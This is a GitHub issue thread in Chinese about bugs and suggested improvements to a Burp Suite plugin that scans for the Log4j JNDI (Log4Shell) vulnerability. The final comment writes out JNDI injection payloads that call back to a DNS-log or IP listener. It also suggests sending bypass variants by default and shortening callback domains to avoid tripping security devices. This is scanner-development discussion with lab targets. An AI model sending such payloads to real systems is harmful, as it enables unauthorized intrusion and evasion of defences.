-
Notifications
You must be signed in to change notification settings - Fork 111
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
关于部分的优化建议 #21
Comments
感谢师傅反馈 |
xxx.ceye.io 支持还是有问题dns有记录但插件上没检测出来。而且第一次发送请求后再一次测试就不会重复发送了。修改配置也无法再次发送请求得手动发送。测试靶场:http://d63bb2586.lab.aqlab.cn |
感谢师傅反馈, |
0.15 bug太多了,师傅等0.16版本出来再提建议吧,我这两个版本同时改代码,忙不过来了 |
嗯 你先修BUG
…------------------ 原始邮件 ------------------
发件人: ***@***.***>;
发送时间: 2021年12月15日(星期三) 下午5:27
收件人: ***@***.***>;
抄送: ***@***.***>; ***@***.***>;
主题: Re: [f0ng/log4j2burpscanner] 关于部分的优化建议 (Issue #21)
0.15 bug太多了,师傅等0.16版本出来再提建议吧,我这两个版本同时改代码,忙不过来了
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.
|
|
加油!希望改的越来越好。先修BUG再改进功能
…------------------ 原始邮件 ------------------
发件人: ***@***.***>;
发送时间: 2021年12月15日(星期三) 晚上6:16
收件人: ***@***.***>;
抄送: ***@***.***>; ***@***.***>;
主题: Re: [f0ng/log4j2burpscanner] 关于部分的优化建议 (Issue #21)
0.15.5版本修复了ceye.io无法检测漏洞的问题,原因是回溯了代码😓
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.
|
建议1已在 |
师傅 能不能改成自行选择插入点,哪些字段进行测试,如get cookie等。 |
目前默认情况是get都会插入,cookie可以选择全部和单个,在自定义参数页面 |
建议3已在 |
目前是取每个路径的第一个字符,如uri为"/login/uri/index.php”,那么请求的dnslog为l.u.i.p.xxxx.ceye.io,减少长度 |
1.内网很多时候不会特意搭建dnslog来测试,更多的是直接启用jndi服务然后存在漏洞的资产主动回连你所设置的ldap/rmi://ip:port/xxx。插件的设置只支持内网的dnslog格式而且不带域名解析的情况下生成的参数根本无法正常访问。目标机子没有你的域名解析记录,所以只能是完整的IP格式
错误的:${jndi:dns://0.POST.192.168.80.10.hello.192.168.80.6:8001/%20test}
正确的:${jndi:dns://192.168.80.6:8001/%20test}
这样的情况就会出现没办法定位漏洞参数位置,但是可以找到存在漏洞。需要进一步手工一个一个参数测试。不能依靠域名解析时候携带的数字编号进行快速定位了。这部分的优化时可以把内网的dnslog配置直接用ip:port的方式代替,出不出网都没办法解析到你私有化部署的dnslog。
2.还有dns改rmi发送的payload还是dns。改ldap干脆就不发送了。干脆3个轮流遍历一遍这样能省去很多时间,特别面对众多资产的时候3个参数轮着改还要所有访问再执行一遍效率很低。你可以加个开关要么指定要么默认3个都测试一遍。
3.{jndi:dns://0.POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce.xxx.ceye.io/%20test POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce. 这部分有点多余是不是可以考虑简化一下,万一域名带奇怪的内容反而回连时触发了安全设备的规则。保留数字的部分0.xxx.ceye.io/%20test即可。
4.jndi:绕过的几个格式都加入到默认发送的状态,保证漏洞定位的准确性。
The text was updated successfully, but these errors were encountered: